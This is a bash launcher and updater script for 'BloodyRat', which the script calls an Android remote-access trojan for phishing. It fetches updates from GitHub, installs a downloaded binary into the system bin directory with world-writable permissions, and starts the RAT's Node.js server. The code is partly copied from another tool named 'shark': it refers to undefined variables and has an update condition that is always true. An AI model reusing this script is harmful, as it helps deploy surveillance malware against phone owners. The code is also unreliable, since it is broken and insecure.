#! /bin/bash

VERSION="1.0.1"

function update() {
	version=$(curl -L -s https://raw.githubusercontent.com/Bhaviktutorials/BloodyRat/main/files/BloodyRat | grep -w "VERSION=" | head -n1)
	latest_version=$(echo ${version} | sed -e 's/[^0-9]\+[^0-9]/ /g' | cut -d '"' -f1)
	if [ "${1}" != "-u" ] || [ "${1}" != "--update" ]; then
		[ ${latest_version} != ${VERSION} ] && echo && msg "shark update is available !!" && sleep 2.5 && echo && msg "Run BloodyRat -u , BloodyRat --update" && echo && exit 1;	       
        fi
}

function connection() {
        ping -c 1 google.com > /dev/null 2>&1
        if [[ "$?" != 0 ]];then
                error_msg "No internet"
        exit 0
        fi
}

function internet() {	
	ping -c 1 google.com > /dev/null 2>&1
        if [ $? -eq 0 -a ! "${1}" = "--update" ] && [ $? -eq 0 -a ! "$1" = "-u" ];then		
                update
	fi
}

function main_update() {
	launch="updating BloodyRat"
	splashdown="updated BloodyRat";echo
	os;(wget -q https://github.com/Bhaviktutorials/shark/raw/master/shark -O ${shark}/shark && rm -rf ${old_shark} && cp -rf ${shark}/shark $BIN && chmod 777 $BIN/shark) & spinner
}

function check_update() {	
        connection
        version=$(curl -L -s https://raw.githubusercontent.com/Bhaviktutorials/BloodyRat/main/files/BloodyRat | grep -w "VERSION=" | head -n1)
	latest_version=$(echo ${version} | sed -e 's/[^0-9]\+[^0-9]/ /g' | cut -d '"' -f1)
        if [ ${latest_version} = ${VERSION} ];then		
                echo -e "\tReading \tpackage \tlists... \tDone
                         \tBuilding \tdependency \ttree       
                         \tReading \tstate \tinformation... \tDone
                         \tBloodyRat \tis \talready \tthe \tnewest \tversion \t($VERSION)." | awk '{$1=$1};1'
	        exit 1
	else
		main_update
		exit 1
	fi
}

usage() {
        cat <<EOF
Usage: $(basename $0) [OPTIONS] available
BloodyRat - future of phishing is here,
A BloodyRat is a android Rat.
Copyright 2020 <ashishsingh103020@gmail.com>
Options:
  -u, --update      Update shark
  -v, --version     Display the current shark version installed on your device
  -h, --help        Print this help message
  --fix-apkbuilder  Fix aapt2 path to build apk
For additional info, see: https://github.com/Bhaviktutorials/shark
EOF
}

 
#getopts argument
while true; do
        case "$1" in		
                -u|--update)			
	                check_update
			;;

                -h|--help)			
                        usage       
                        exit 1
			;;

                -v|--version)			
                        printf "version $VERSION\n"
                        exit 1
                        ;;

		--fix-apkbuilder)			
			sed -i -e 's/\r$//' ${hackadroid_main}/setup
			chmod 777 ${hackadroid_main}/setup
		        ${hackadroid_main}/setup
			exit 1
			;;

                -*)			
                        echo "ERROR: unknown option '$1'" 1>&2
                        echo "see '--help' for usage" 1>&2
                        exit 1
                        ;;

                *)	
                        f=$1
                        break			
                        ;;
	esac
        shift
done

user_name=`logname`
function os() {
	arch=`uname -m`
	if [[ "${arch}" = "x86_64" || "${arch}" = "x86" ]]; then
		OS=DEBIAN 		
		main="/home/${user_name}/.BloodyRat/server"			
	else   	        
		OS=TERMUX		
		#main="/usr/share/BloodyRat/server"
fi
}
os
cd ${main}
node index.js
